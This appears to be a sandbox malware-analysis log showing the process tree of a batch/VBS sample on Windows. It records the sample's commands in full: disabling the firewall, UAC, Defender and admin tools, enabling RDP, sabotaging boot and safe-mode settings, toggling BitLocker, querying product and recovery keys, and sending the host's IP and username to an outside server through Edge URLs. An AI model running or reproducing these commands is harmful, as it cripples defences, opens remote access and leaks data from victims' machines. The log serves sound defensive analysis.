PID 1896 wrote to memory of 3260	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 3120	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 3120	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 1172	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 1172	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 2780	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 2780	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 3344	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 3344	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 5072	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 5072	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 3012	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 3012	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4304	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4304	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4348	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4348	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 840	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 840	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4052	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4052	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4624	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4624	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 1584	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 1584	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4676	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4676	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 5008	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 5008	1896	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"
1⤵
PID:4896

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\system32\net.exe
net session
2⤵
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:4780

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\PlugPlay' -Name 'Start' -Value 4"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:2428

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:3856

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:2688

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
PID:3724

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:4432

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:2716

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:4328

C:\Windows\system32\reg.exe
REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
2⤵
PID:4476

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:2256

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
PID:2232

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:3260

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
PID:3120

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
PID:1172

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:2780

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:3344

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:5072

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3012

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
PID:4304

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:4348

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
PID:840

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4052

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4624

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:1584

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4676

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:5008

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:4848

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
PID:3524

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:3692

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:2088

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:2112

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
2⤵
PID:3164

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:4360

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:4384

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:756

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:1588

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Disables RegEdit via registry modification
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:2148

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:3620

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:4612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.107
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718
3⤵
PID:184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
3⤵
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
3⤵
PID:3148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
3⤵
PID:3712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
3⤵
PID:3440

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 /prefetch:8
3⤵
PID:4880

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1
3⤵
PID:5496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
3⤵
PID:5648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
3⤵
PID:5968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
3⤵
PID:5824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
3⤵
PID:5600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
3⤵
PID:5800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
3⤵
PID:2236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
3⤵
PID:6312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:876

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin
2⤵
PID:5432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718
3⤵
PID:5444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=bvrkipts\admin
2⤵
PID:5508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718
3⤵
PID:5532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "Admin"
2⤵
PID:5588

C:\Windows\system32\net.exe
net user "Admin"
3⤵
PID:5604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "Admin"
4⤵
PID:5620

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5724

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5748

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:5768

C:\Windows\system32\manage-bde.exe
manage-bde -on C:
2⤵
PID:5804

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:5940

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:5956

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:5972

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:5984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:6000

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6128

C:\Windows\system32\icacls.exe
icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"
2⤵
PID:5356

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"
3⤵
PID:5656

C:\Windows\system32\find.exe
find "BackupProductKeyDefault"
3⤵
PID:5364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=
2⤵
PID:3956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718
3⤵
PID:5820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ExecutionPolicy Restricted -Scope CurrentUser -Force"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE" /v "RecoveryKey" 2>nul | findstr "RecoveryKey"
2⤵
PID:6168

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE" /v "RecoveryKey"
3⤵
PID:6184

C:\Windows\system32\findstr.exe
findstr "RecoveryKey"
3⤵
PID:6192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=
2⤵
PID:6216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718
3⤵
PID:6236

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6228

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6348

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6384

C:\Windows\system32\timeout.exe
timeout /t 300 /nobreak
2⤵
- Delays execution with timeout.exe
PID:6412

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1584

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
1⤵
PID:6016

C:\Windows\system32\net.exe
net session
2⤵
PID:6032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:6084

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:6100

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:6140

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\PlugPlay' -Name 'Start' -Value 4"
2⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:5796

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:5980

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:6048

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6140

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:3312

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:5620

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:5632

C:\Windows\system32\reg.exe
REG IMPORT "C:\Windows\TEMP\disable_winload.reg"
2⤵
PID:5552

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:5956

